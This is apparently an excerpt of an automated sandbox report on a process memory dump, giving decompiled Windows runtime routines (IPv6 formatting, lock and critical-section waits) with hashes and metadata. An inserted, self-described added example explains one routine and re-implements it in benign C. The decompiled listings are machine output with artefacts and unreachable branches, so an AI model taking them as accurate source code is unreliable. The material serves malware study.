                                                                            						_t28 =  &_v140;
                                                                            						if(_a12 != 0) {
                                                                            							_push("[");
                                                                            							_push(0x41);
                                                                            							_push( &_v140);
                                                                            							_t29 = E02627707();
                                                                            							_t58 = _t58 + 0xc;
                                                                            							_t28 = _t57 + _t29 * 2 - 0x88;
                                                                            						}
                                                                            						_t54 = E026313CB(_t53, _t28);
                                                                            						if(_a8 != 0) {
                                                                            							_t34 = E02627707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
                                                                            							_t58 = _t58 + 0x10;
                                                                            							_t54 = _t54 + _t34 * 2;
                                                                            						}
                                                                            						if(_a12 != 0) {
                                                                            							_t40 = E02627707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
                                                                            							_t58 = _t58 + 0x10;
                                                                            							_t54 = _t54 + _t40 * 2;
                                                                            						}
                                                                            						_t53 = (_t54 -  &_v140 >> 1) + 1;
                                                                            						 *_t52 = _t53;
                                                                            						if( *_t52 < _t53) {
                                                                            							goto L10;
                                                                            						} else {
                                                                            							E025F2340(_t45,  &_v140, _t53 + _t53);
                                                                            							_t26 = 0;
                                                                            						}
                                                                            					}
                                                                            				}
                                                                            				return E025FE1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
                                                                            			}

                                                                            Instruction addresses, one per statement line of E026314C0 above, in order:
                                                                            0x026314c0 0x026314cb 0x026314d2 0x026314d6 0x026314da 0x026314de 0x026314e3 0x0263157a
                                                                            0x0263157a 0x026314f1 0x026314f3 0x0265ea0f 0x00000000 0x0265ea15 0x00000000 0x0265ea15
                                                                            0x026314f9 0x026314f9 0x026314fe 0x02631504 0x0265ea1a 0x0265ea1f 0x0265ea21 0x0265ea22
                                                                            0x0265ea27 0x0265ea2a 0x0265ea2a 0x02631515 0x02631517 0x0263156d 0x02631572 0x02631575
                                                                            0x02631575 0x0263151e 0x0265ea50 0x0265ea55 0x0265ea58 0x0265ea58 0x0263152e 0x02631531
                                                                            0x02631533 0x00000000 0x02631535 0x02631541 0x02631549 0x02631549 0x02631533 0x026314f3
                                                                            0x02631559

                                                                            APIs
                                                                            • ___swprintf_l.LIBCMT ref: 0265EA22
                                                                              • Part of subcall function 026313CB: ___swprintf_l.LIBCMT ref: 0263146B
                                                                              • Part of subcall function 026313CB: ___swprintf_l.LIBCMT ref: 02631490
                                                                            • ___swprintf_l.LIBCMT ref: 0263156D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.675434815.00000000025E0000.00000040.00000001.sdmp, Offset: 025D0000, based on PE: true
                                                                            • Associated: 00000007.00000002.675426183.00000000025D0000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.675538711.00000000026C0000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.675551965.00000000026D0000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.675564641.00000000026D4000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.675587676.00000000026D7000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.675623414.00000000026E0000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.675712304.0000000002740000.00000040.00000001.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_25d0000_msdt.jbxd
                                                                            Similarity
                                                                            • API ID: ___swprintf_l
                                                                            • String ID: %%%u$]:%u
                                                                            • API String ID: 48624451-3050659472
                                                                            • Opcode ID: 2b2b3a750d2328421a5a283513a09241842293cb8ae8a042fc7a018245b75b98
                                                                            • Instruction ID: 2503306a5fcc3ad7bb2e4ec23f391f237410b49659ef175094a576a9c1016dfa
                                                                            • Opcode Fuzzy Hash: 2b2b3a750d2328421a5a283513a09241842293cb8ae8a042fc7a018245b75b98
                                                                            • Instruction Fuzzy Hash: 9221D5B39006299BDF22DF64CC40AEEB3ACBB51714F444496ED4AD3240DB71EA598FE1
                                                                            Uniqueness
                                                                            Uniqueness Score: -1.00%
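The decompiled E026314C0 above assembles its output in pieces: an optional "[" when _a12 (the port) is non-zero, the address text produced by the subcall E026313CB, an optional "%%%u" scope suffix when _a8 is non-zero, then "]:%u" with the port, and finally it stores the character count (terminator included) through _a20 and returns 0xc000000d (STATUS_INVALID_PARAMETER) when the caller's buffer is too short. That layout matches the documented output of ntdll's RtlIpv6AddressToStringExW, but the page does not name the function, so treat the identification as an assumption. The C program below is an added example, not code from the sample or from the report, that re-implements the same contract portably (narrow chars instead of WCHAR, and a hand-written address formatter with "::" compression standing in for E026313CB, whose body is not on the page) so the length handling can be exercised directly:

```c
/*
 * Added example (not code from the sample or the report): a portable C
 * re-implementation of the formatting contract visible in the decompiled
 * E026314C0. The "[" / "%%%u" / "]:%u" layout matches the documented output
 * of ntdll's RtlIpv6AddressToStringExW; that identification is an assumption.
 */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define NT_STATUS_SUCCESS           0x00000000u
#define NT_STATUS_INVALID_PARAMETER 0xC000000Du   /* the 0xc000000d returned at L10 */

/* Constructed demo inputs: 2001:db8::1 and ::1. */
static const uint8_t DEMO_ADDR[16] = {0x20,0x01,0x0d,0xb8,0,0,0,0,0,0,0,0,0,0,0,1};
static const uint8_t LOOPBACK[16]  = {0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1};

/* Plain IPv6 text with the longest zero run (>= 2 hextets) collapsed to "::".
 * Stands in for the subcall E026313CB. cap must be at least 40. */
static size_t ipv6_to_text(const uint8_t addr[16], char *out, size_t cap)
{
    uint16_t h[8];
    int best_start = -1, best_len = 0;
    size_t n = 0;
    for (int i = 0; i < 8; i++)
        h[i] = (uint16_t)((addr[2 * i] << 8) | addr[2 * i + 1]);
    for (int i = 0; i < 8;) {                 /* locate the longest zero run */
        if (h[i] != 0) { i++; continue; }
        int j = i;
        while (j < 8 && h[j] == 0) j++;
        if (j - i >= 2 && j - i > best_len) { best_start = i; best_len = j - i; }
        i = j;
    }
    for (int i = 0; i < 8;) {
        if (i == best_start) {                /* emit "::" once for the run */
            n += (size_t)snprintf(out + n, cap - n, "::");
            i += best_len;
            continue;
        }
        if (n > 0 && out[n - 1] != ':')       /* separator unless right after "::" */
            n += (size_t)snprintf(out + n, cap - n, ":");
        n += (size_t)snprintf(out + n, cap - n, "%x", h[i]);
        i++;
    }
    return n;
}

/* Argument layout mirrors the decompile: _a4 address, _a8 scope id, _a12 port,
 * _a16 output buffer, _a20 in/out length in characters including the NUL.
 * A NULL buffer is accepted only with *len == 0 (the _a16/_a20 check at the
 * top of E026314C0); the required length is then reported through *len next
 * to the error status, which is what makes a size query possible. */
uint32_t ipv6_address_to_string_ex(const uint8_t *addr, uint32_t scope_id,
                                   uint16_t port, char *out, uint32_t *len)
{
    char tmp[96];   /* "[" + 39 + "%4294967295" + "]:65535" + NUL = 59 at most */
    char text[48];
    size_t n = 0;

    if (addr == NULL || len == NULL) return NT_STATUS_INVALID_PARAMETER;
    if (out == NULL && *len != 0)   return NT_STATUS_INVALID_PARAMETER;

    if (port != 0)     n += (size_t)snprintf(tmp + n, sizeof tmp - n, "[");
    ipv6_to_text(addr, text, sizeof text);
    n += (size_t)snprintf(tmp + n, sizeof tmp - n, "%s", text);
    if (scope_id != 0) n += (size_t)snprintf(tmp + n, sizeof tmp - n, "%%%u", scope_id);
    if (port != 0)     n += (size_t)snprintf(tmp + n, sizeof tmp - n, "]:%u", (unsigned)port);

    uint32_t needed = (uint32_t)n + 1;            /* (_t54 - &_v140 >> 1) + 1 */
    if (*len < needed) { *len = needed; return NT_STATUS_INVALID_PARAMETER; }
    *len = needed;
    memcpy(out, tmp, needed);                      /* E025F2340 copies the result out */
    return NT_STATUS_SUCCESS;
}

/* Size query: NULL buffer and zero length; the required count comes back in len. */
uint32_t needed_length(const uint8_t *addr, uint32_t scope_id, uint16_t port)
{
    uint32_t len = 0;
    ipv6_address_to_string_ex(addr, scope_id, port, NULL, &len);
    return len;
}

/* Demo helper: format into a static buffer of cap characters, NULL on failure. */
const char *format_or_null(const uint8_t *addr, uint32_t scope_id, uint16_t port, uint32_t cap)
{
    static char buf[96];
    uint32_t len = cap;
    if (cap > sizeof buf) return NULL;
    if (ipv6_address_to_string_ex(addr, scope_id, port, buf, &len) != NT_STATUS_SUCCESS)
        return NULL;
    return buf;
}

int main(void)
{
    uint32_t need = needed_length(DEMO_ADDR, 3, 443);
    printf("needed=%u text=%s\n", need, format_or_null(DEMO_ADDR, 3, 443, need));
    printf("one short: %s\n", format_or_null(DEMO_ADDR, 3, 443, need - 1) ? "ok" : "STATUS_INVALID_PARAMETER");
    return 0;
}
```

The needed_length helper is the size-query idiom the contract allows: pass a NULL buffer with *len == 0, take STATUS_INVALID_PARAMETER as the expected answer, and read the required count back before allocating. The one place this example deliberately departs from the listing is the order of the store to *_a20 and the comparison: as decompiled (`*_t52 = _t53; if (*_t52 < _t53)`) the too-small branch is unsatisfiable, which reads as a decompiler artefact, so the example compares the caller's value first as the documented contract requires.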

                                                                            C-Code - Quality: 45%
                                                                            			E026153A5(signed int _a4, char _a8) {
                                                                            				void* __ebx;
                                                                            				void* __edi;
                                                                            				void* __esi;
                                                                            				signed int _t32;
                                                                            				signed int _t37;
                                                                            				signed int _t40;
                                                                            				signed int _t42;
                                                                            				void* _t45;
                                                                            				intOrPtr _t46;
                                                                            				void* _t48;
                                                                            				signed int _t49;
                                                                            				void* _t51;
                                                                            				signed int _t57;
                                                                            				signed int _t64;
                                                                            				signed int _t71;
                                                                            				void* _t74;
                                                                            				intOrPtr _t78;
                                                                            				signed int* _t79;
                                                                            				void* _t85;
                                                                            				signed int _t86;
                                                                            				signed int _t92;
                                                                            				void* _t104;
                                                                            				void* _t105;
                                                                            
                                                                            				_t64 = _a4;
                                                                            				_t32 =  *(_t64 + 0x28);
                                                                            				_t71 = _t64 + 0x28;
                                                                            				_push(_t92);
                                                                            				if(_t32 < 0) {
                                                                            					_t78 =  *[fs:0x18];
                                                                            					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
                                                                            					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
                                                                            						goto L3;
                                                                            					} else {
                                                                            						__eflags = _t32 | 0xffffffff;
                                                                            						asm("lock xadd [ecx], eax");
                                                                            						return 1;
                                                                            					}
                                                                            				} else {
                                                                            					L3:
                                                                            					_push(_t86);
                                                                            					while(1) {
                                                                            						L4:
                                                                            						__eflags = _t32;
                                                                            						if(_t32 == 0) {
                                                                            							break;
                                                                            						}
                                                                            						__eflags = _a8;
                                                                            						if(_a8 == 0) {
                                                                            							__eflags = 0;
                                                                            							return 0;
                                                                            						} else {
                                                                            							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
                                                                            							_t79 = _t64 + 0x24;
                                                                            							_t71 = 1;
                                                                            							asm("lock xadd [eax], ecx");
                                                                            							_t32 =  *(_t64 + 0x28);
                                                                            							_a4 = _t32;
                                                                            							__eflags = _t32;
                                                                            							if(_t32 != 0) {
                                                                            								L19:
                                                                            								_t86 = 0;
                                                                            								__eflags = 0;
                                                                            								while(1) {
                                                                            									_t81 =  *(_t64 + 0x30) & 0x00000001;
                                                                            									asm("sbb esi, esi");
                                                                            									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x026d01c0;
                                                                            									_push(_t92);
                                                                            									_push(0);
                                                                            									_t37 = E025EF8CC( *((intOrPtr*)(_t64 + 0x20)));
                                                                            									__eflags = _t37 - 0x102;
                                                                            									if(_t37 != 0x102) {
                                                                            										break;
                                                                            									}
                                                                            									_t71 =  *(_t92 + 4);
                                                                            									_t85 =  *_t92;
                                                                            									_t51 = E02634FC0(_t85, _t71, 0xff676980, 0xffffffff);
                                                                            									_push(_t85);
                                                                            									_push(_t51);
                                                                            									E02643F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
                                                                            									E02643F92(0x65, 0, "RTL: Resource at %p\n", _t64);
                                                                            									_t86 = _t86 + 1;
                                                                            									_t105 = _t104 + 0x28;
                                                                            									__eflags = _t86 - 2;
                                                                            									if(__eflags > 0) {
                                                                            										E0267217A(_t71, __eflags, _t64);
                                                                            									}
                                                                            									_push("RTL: Re-Waiting\n");
                                                                            									_push(0);
                                                                            									_push(0x65);
                                                                            									E02643F92();
                                                                            									_t104 = _t105 + 0xc;
                                                                            								}
                                                                            								__eflags = _t37;
                                                                            								if(__eflags < 0) {
                                                                            									_push(_t37);
                                                                            									E02633915(_t64, _t71, _t81, _t86, _t92, __eflags);
                                                                            									asm("int3");
                                                                            									_t40 =  *_t71;
                                                                            									 *_t71 = 0;
                                                                            									__eflags = _t40;
                                                                            									if(_t40 == 0) {
                                                                            										L1:
                                                                            										_t42 = E02615384(_t92 + 0x24);
                                                                            										if(_t42 != 0) {
                                                                            											goto L31;
                                                                            										} else {
                                                                            											goto L2;
                                                                            										}
                                                                            									} else {
                                                                            										_t83 =  *((intOrPtr*)(_t92 + 0x18));
                                                                            										_push( &_a4);
                                                                            										_push(_t40);
                                                                            										_t49 = E025EF970( *((intOrPtr*)(_t92 + 0x18)));
                                                                            										__eflags = _t49;
                                                                            										if(__eflags >= 0) {
                                                                            											goto L1;
                                                                            										} else {
                                                                            											_push(_t49);
                                                                            											E02633915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
                                                                            											L31:
                                                                            											_t82 =  *((intOrPtr*)(_t92 + 0x20));
                                                                            											_push( &_a4);
                                                                            											_push(1);
                                                                            											_t42 = E025EF970( *((intOrPtr*)(_t92 + 0x20)));
                                                                            											__eflags = _t42;
                                                                            											if(__eflags >= 0) {
                                                                            												L2:
                                                                            												return _t42;
                                                                            											} else {
                                                                            												_push(_t42);
                                                                            												E02633915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
                                                                            												_t73 =  *((intOrPtr*)(_t92 + 0x20));
                                                                            												_push( &_a4);
                                                                            												_push(1);
                                                                            												_t42 = E025EF970( *((intOrPtr*)(_t92 + 0x20)));
                                                                            												__eflags = _t42;
                                                                            												if(__eflags >= 0) {
                                                                            													goto L2;
                                                                            												} else {
                                                                            													_push(_t42);
                                                                            													_t45 = E02633915(_t64, _t73, _t82, _t86, _t92, __eflags);
                                                                            													asm("int3");
                                                                            													while(1) {
                                                                            														_t74 = _t45;
                                                                            														__eflags = _t45 - 1;
                                                                            														if(_t45 != 1) {
                                                                            															break;
                                                                            														}
                                                                            														_t86 = _t86 | 0xffffffff;
                                                                            														_t45 = _t74;
                                                                            														asm("lock cmpxchg [ebx], edi");
                                                                            														__eflags = _t45 - _t74;
                                                                            														if(_t45 != _t74) {
                                                                            															continue;
                                                                            														} else {
                                                                            															_t46 =  *[fs:0x18];
                                                                            															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
                                                                            															return _t46;
                                                                            														}
                                                                            														goto L38;
                                                                            													}
                                                                            													E02615329(_t74, _t92);
                                                                            													_push(1);
                                                                            													_t48 = E026153A5(_t92);
                                                                            													return _t48;
                                                                            												}
                                                                            											}
                                                                            										}
                                                                            									}
                                                                            								} else {
                                                                            									_t32 =  *(_t64 + 0x28);
                                                                            									continue;
                                                                            								}
                                                                            							} else {
                                                                            								_t71 =  *_t79;
                                                                            								__eflags = _t71;
                                                                            								if(__eflags > 0) {
                                                                            									while(1) {
                                                                            										_t57 = _t71;
                                                                            										asm("lock cmpxchg [edi], esi");
                                                                            										__eflags = _t57 - _t71;
                                                                            										if(_t57 == _t71) {
                                                                            											break;
                                                                            										}
                                                                            										_t71 = _t57;
                                                                            										__eflags = _t57;
                                                                            										if(_t57 > 0) {
                                                                            											continue;
                                                                            										}
                                                                            										break;
                                                                            									}
                                                                            									_t32 = _a4;
                                                                            									__eflags = _t71;
                                                                            								}
                                                                            								if(__eflags != 0) {
                                                                            									continue;
                                                                            								} else {
                                                                            									goto L19;
                                                                            								}
                                                                            							}
                                                                            						}
                                                                            						goto L38;
                                                                            					}
                                                                            					_t71 = _t71 | 0xffffffff;
                                                                            					_t32 = 0;
                                                                            					asm("lock cmpxchg [edx], ecx");
                                                                            					__eflags = 0;
                                                                            					if(0 != 0) {
                                                                            						goto L4;
                                                                            					} else {
                                                                            						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                                            						return 1;
                                                                            					}
                                                                            				}
                                                                            				L38:
                                                                            			}

                                                                            APIs
                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 026522F4
                                                                            Strings
                                                                            • RTL: Re-Waiting, xrefs: 02652328
                                                                            • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 026522FC
                                                                            • RTL: Resource at %p, xrefs: 0265230B
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.675434815.00000000025E0000.00000040.00000001.sdmp, Offset: 025D0000, based on PE: true
                                                                            • Associated: 00000007.00000002.675426183.00000000025D0000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.675538711.00000000026C0000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.675551965.00000000026D0000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.675564641.00000000026D4000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.675587676.00000000026D7000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.675623414.00000000026E0000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.675712304.0000000002740000.00000040.00000001.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_25d0000_msdt.jbxd
                                                                            Similarity
                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                            • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                            • API String ID: 885266447-871070163
                                                                            • Opcode ID: cfa64d02f852f6cff9b097959ad2513d09dbac8fc354566fedb2fabae872ad1e
                                                                            • Instruction ID: 278380a87ebb73ca197923d0600dd74de0db1916d875a2375ce56a7cfefa8073
                                                                            • Opcode Fuzzy Hash: cfa64d02f852f6cff9b097959ad2513d09dbac8fc354566fedb2fabae872ad1e
                                                                            • Instruction Fuzzy Hash: 8651F771600716ABEB159F68CC90FA67399AF84324F14425DFD49DB380FB71E8418BA8
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 51%
                                                                            			E0261EC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
                                                                            				intOrPtr _v8;
                                                                            				intOrPtr _v12;
                                                                            				signed int _v24;
                                                                            				intOrPtr* _v28;
                                                                            				intOrPtr _v32;
                                                                            				signed int _v36;
                                                                            				intOrPtr _v40;
                                                                            				short _v66;
                                                                            				char _v72;
                                                                            				void* __esi;
                                                                            				intOrPtr _t38;
                                                                            				intOrPtr _t39;
                                                                            				signed int _t40;
                                                                            				intOrPtr _t42;
                                                                            				intOrPtr _t43;
                                                                            				signed int _t44;
                                                                            				void* _t46;
                                                                            				intOrPtr _t48;
                                                                            				signed int _t49;
                                                                            				intOrPtr _t50;
                                                                            				intOrPtr _t53;
                                                                            				signed char _t67;
                                                                            				void* _t72;
                                                                            				intOrPtr _t77;
                                                                            				intOrPtr* _t80;
                                                                            				intOrPtr _t84;
                                                                            				intOrPtr* _t85;
                                                                            				void* _t91;
                                                                            				void* _t92;
                                                                            				void* _t93;
                                                                            
                                                                            				_t80 = __edi;
                                                                            				_t75 = __edx;
                                                                            				_t70 = __ecx;
                                                                            				_t84 = _a4;
                                                                            				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
                                                                            					E0260DA92(__ecx, __edx, __eflags, _t84);
                                                                            					_t38 =  *((intOrPtr*)(_t84 + 0x10));
                                                                            				}
                                                                            				_push(0);
                                                                            				__eflags = _t38 - 0xffffffff;
                                                                            				if(_t38 == 0xffffffff) {
                                                                            					_t39 =  *0x26d793c; // 0x0
                                                                            					_push(0);
                                                                            					_push(_t84);
                                                                            					_t40 = E025F16C0(_t39);
                                                                            				} else {
                                                                            					_t40 = E025EF9D4(_t38);
                                                                            				}
                                                                            				_pop(_t85);
                                                                            				__eflags = _t40;
                                                                            				if(__eflags < 0) {
                                                                            					_push(_t40);
                                                                            					E02633915(_t67, _t70, _t75, _t80, _t85, __eflags);
                                                                            					asm("int3");
                                                                            					while(1) {
                                                                            						L21:
                                                                            						_t76 =  *[fs:0x18];
                                                                            						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
                                                                            						__eflags =  *(_t42 + 0x240) & 0x00000002;
                                                                            						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
                                                                            							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
                                                                            							_v66 = 0x1722;
                                                                            							_t71 =  *((intOrPtr*)(_t85 + 0xc));
                                                                            							_t76 =  &_v72;
                                                                            							_push( &_v72);
                                                                            							_v28 = _t85;
                                                                            							_v40 =  *((intOrPtr*)(_t85 + 4));
                                                                            							_v32 =  *((intOrPtr*)(_t85 + 0xc));
                                                                            							_push(0x10);
                                                                            							_push(0x20402);
                                                                            							E025F01A4( *0x7ffe0382 & 0x000000ff);
                                                                            						}
                                                                            						while(1) {
                                                                            							_t43 = _v8;
                                                                            							_push(_t80);
                                                                            							_push(0);
                                                                            							__eflags = _t43 - 0xffffffff;
                                                                            							if(_t43 == 0xffffffff) {
                                                                            								_t71 =  *0x26d793c; // 0x0
                                                                            								_push(_t85);
                                                                            								_t44 = E025F1F28(_t71);
                                                                            							} else {
                                                                            								_t44 = E025EF8CC(_t43);
                                                                            							}
                                                                            							__eflags = _t44 - 0x102;
                                                                            							if(_t44 != 0x102) {
                                                                            								__eflags = _t44;
                                                                            								if(__eflags < 0) {
                                                                            									_push(_t44);
                                                                            									E02633915(_t67, _t71, _t76, _t80, _t85, __eflags);
                                                                            									asm("int3");
                                                                            									E02672306(_t85);
                                                                            									__eflags = _t67 & 0x00000002;
                                                                            									if((_t67 & 0x00000002) != 0) {
                                                                            										_t7 = _t67 + 2; // 0x4
                                                                            										_t72 = _t7;
                                                                            										asm("lock cmpxchg [edi], ecx");
                                                                            										__eflags = _t67 - _t67;
                                                                            										if(_t67 == _t67) {
                                                                            											E0261EC56(_t72, _t76, _t80, _t85);
                                                                            										}
                                                                            									}
                                                                            									return 0;
                                                                            								} else {
                                                                            									__eflags = _v24;
                                                                            									if(_v24 != 0) {
                                                                            										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
                                                                            									}
                                                                            									return 2;
                                                                            								}
                                                                            								goto L36;
                                                                            							}
                                                                            							_t77 =  *((intOrPtr*)(_t80 + 4));
                                                                            							_push(_t67);
                                                                            							_t46 = E02634FC0( *_t80, _t77, 0xff676980, 0xffffffff);
                                                                            							_push(_t77);
                                                                            							E02643F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
                                                                            							_t48 =  *_t85;
                                                                            							_t92 = _t91 + 0x18;
                                                                            							__eflags = _t48 - 0xffffffff;
                                                                            							if(_t48 == 0xffffffff) {
                                                                            								_t49 = 0;
                                                                            								__eflags = 0;
                                                                            							} else {
                                                                            								_t49 =  *((intOrPtr*)(_t48 + 0x14));
                                                                            							}
                                                                            							_t71 =  *((intOrPtr*)(_t85 + 0xc));
                                                                            							_push(_t49);
                                                                            							_t50 = _v12;
                                                                            							_t76 =  *((intOrPtr*)(_t50 + 0x24));
                                                                            							_push(_t85);
                                                                            							_push( *((intOrPtr*)(_t85 + 0xc)));
                                                                            							_push( *((intOrPtr*)(_t50 + 0x24)));
                                                                            							E02643F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
                                                                            							_t53 =  *_t85;
                                                                            							_t93 = _t92 + 0x20;
                                                                            							_t67 = _t67 + 1;
                                                                            							__eflags = _t53 - 0xffffffff;
                                                                            							if(_t53 != 0xffffffff) {
                                                                            								_t71 =  *((intOrPtr*)(_t53 + 0x14));
                                                                            								_a4 =  *((intOrPtr*)(_t53 + 0x14));
                                                                            							}
                                                                            							__eflags = _t67 - 2;
                                                                            							if(_t67 > 2) {
                                                                            								__eflags = _t85 - 0x26d20c0;
                                                                            								if(_t85 != 0x26d20c0) {
                                                                            									_t76 = _a4;
                                                                            									__eflags = _a4 - _a8;
                                                                            									if(__eflags == 0) {
                                                                            										E0267217A(_t71, __eflags, _t85);
                                                                            									}
                                                                            								}
                                                                            							}
                                                                            							_push("RTL: Re-Waiting\n");
                                                                            							_push(0);
                                                                            							_push(0x65);
                                                                            							_a8 = _a4;
                                                                            							E02643F92();
                                                                            							_t91 = _t93 + 0xc;
                                                                            							__eflags =  *0x7ffe0382;
                                                                            							if( *0x7ffe0382 != 0) {
                                                                            								goto L21;
                                                                            							}
                                                                            						}
                                                                            						goto L36;
                                                                            					}
                                                                            				} else {
                                                                            					return _t40;
                                                                            				}
                                                                            				L36:
                                                                            			}

                                                                            Strings
                                                                            • RTL: Re-Waiting, xrefs: 026524FA
                                                                            • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 026524BD
                                                                            • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 0265248D
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.675434815.00000000025E0000.00000040.00000001.sdmp, Offset: 025D0000, based on PE: true
                                                                            • Associated: 00000007.00000002.675426183.00000000025D0000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.675538711.00000000026C0000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.675551965.00000000026D0000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.675564641.00000000026D4000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.675587676.00000000026D7000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.675623414.00000000026E0000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.675712304.0000000002740000.00000040.00000001.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_25d0000_msdt.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                                                            • API String ID: 0-3177188983
                                                                            • Opcode ID: 9a0b00b261e43194345339edb840306f050163e6216e878d4174cf172075ec0f
                                                                            • Instruction ID: 04d17b2b575f748d5efd77c9ea5286701d6a03f094d98fe3c34a24143d5724f1
                                                                            • Opcode Fuzzy Hash: 9a0b00b261e43194345339edb840306f050163e6216e878d4174cf172075ec0f
                                                                            • Instruction Fuzzy Hash: 61411870A00215ABDB24DF68CD94F6B77AAEF84320F148609FE659B3C0D731E941CB65
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E0262FCC9(signed short* _a4, char _a7, signed short** _a8, intOrPtr _a12) {
                                                                            				signed int _v8;
                                                                            				signed int _v12;
                                                                            				signed int _v16;
                                                                            				signed int _v20;
                                                                            				signed int _v24;
                                                                            				signed int _v28;
                                                                            				signed int _t105;
                                                                            				void* _t110;
                                                                            				char _t114;
                                                                            				short _t115;
                                                                            				void* _t118;
                                                                            				signed short* _t119;
                                                                            				short _t120;
                                                                            				char _t122;
                                                                            				void* _t127;
                                                                            				void* _t130;
                                                                            				signed int _t136;
                                                                            				intOrPtr _t143;
                                                                            				signed int _t158;
                                                                            				signed short* _t164;
                                                                            				signed int _t167;
                                                                            				void* _t170;
                                                                            
                                                                            				_t158 = 0;
                                                                            				_t164 = _a4;
                                                                            				_v20 = 0;
                                                                            				_v24 = 0;
                                                                            				_v8 = 0;
                                                                            				_v12 = 0;
                                                                            				_v16 = 0;
                                                                            				_v28 = 0;
                                                                            				_t136 = 0;
                                                                            				while(1) {
                                                                            					_t167 =  *_t164 & 0x0000ffff;
                                                                            					if(_t167 == _t158) {
                                                                            						break;
                                                                            					}
                                                                            					_t118 = _v20 - _t158;
                                                                            					if(_t118 == 0) {
                                                                            						if(_t167 == 0x3a) {
                                                                            							if(_v12 > _t158 || _v8 > _t158) {
                                                                            								break;
                                                                            							} else {
                                                                            								_t119 =  &(_t164[1]);
                                                                            								if( *_t119 != _t167) {
                                                                            									break;
                                                                            								}
                                                                            								_t143 = 2;
                                                                            								 *((short*)(_a12 + _t136 * 2)) = 0;
                                                                            								_v28 = 1;
                                                                            								_v8 = _t143;
                                                                            								_t136 = _t136 + 1;
                                                                            								L47:
                                                                            								_t164 = _t119;
                                                                            								_v20 = _t143;
                                                                            								L14:
                                                                            								if(_v24 == _t158) {
                                                                            									L19:
                                                                            									_t164 =  &(_t164[1]);
                                                                            									_t158 = 0;
                                                                            									continue;
                                                                            								}
                                                                            								if(_v12 == _t158) {
                                                                            									if(_v16 > 4) {
                                                                            										L29:
                                                                            										return 0xc000000d;
                                                                            									}
                                                                            									_t120 = E0262EE02(_v24, _t158, 0x10);
                                                                            									_t170 = _t170 + 0xc;
                                                                            									 *((short*)(_a12 + _t136 * 2)) = _t120;
                                                                            									_t136 = _t136 + 1;
                                                                            									goto L19;
                                                                            								}
                                                                            								if(_v16 > 3) {
                                                                            									goto L29;
                                                                            								}
                                                                            								_t122 = E0262EE02(_v24, _t158, 0xa);
                                                                            								_t170 = _t170 + 0xc;
                                                                            								if(_t122 > 0xff) {
